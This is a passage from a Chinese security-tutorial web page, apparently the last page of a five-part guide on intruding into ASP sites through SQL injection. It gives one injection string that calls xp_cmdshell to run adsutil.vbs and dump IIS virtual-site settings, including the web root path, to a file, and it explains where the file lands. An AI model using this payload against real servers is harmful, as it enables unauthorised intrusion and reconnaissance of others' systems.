相关文章  
  • 教你检测你电脑上的间谍软件
  • 网页注册表被修改之迷及解决办法
  • 让你与 IE 弹出窗口彻底告别
  • 最容易被黑客盯上的注册表位置
  • 阐述企业网管监控的十种技巧
  • 六大必杀技:系统安全之对 IE 优化设置
  • 交换环境下 SNIFFER 的几种攻击技术手段
  • 金睛火眼—从进程中判断出病毒和木马
  •   推荐  
      科普之友首页   专利     科普      动物      植物        天文   考古   前沿科技
     您现在的位置在:  首页 >>文献 >>培训

    ASP 漏洞 SQL 注入的入侵方法5

    p;  a’; exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root〉a.txt’; --

        是不是很长啦:)通过它我们可以把iis里面第一个虚拟web站点的设置情况(当然包括它所在的实际目录咯)导入到a.txt中。

        对于a.txt的实际位置默认当然是c:\winnt\system32,其实这都不是问题,不过遇到管理员把adsutil.vbs删了或是放到别的地方我们就没办法了(不可能自已用echo 命令写一个吧)。

    数据载入中...

    页码:[1] [2] [3] [4] [5]5页、共5页

         

          设为首页       |       加入收藏       |       广告服务       |       友情链接       |       版权申明      

    Copyriht 2007 - 2008 ©  科普之友 All right reserved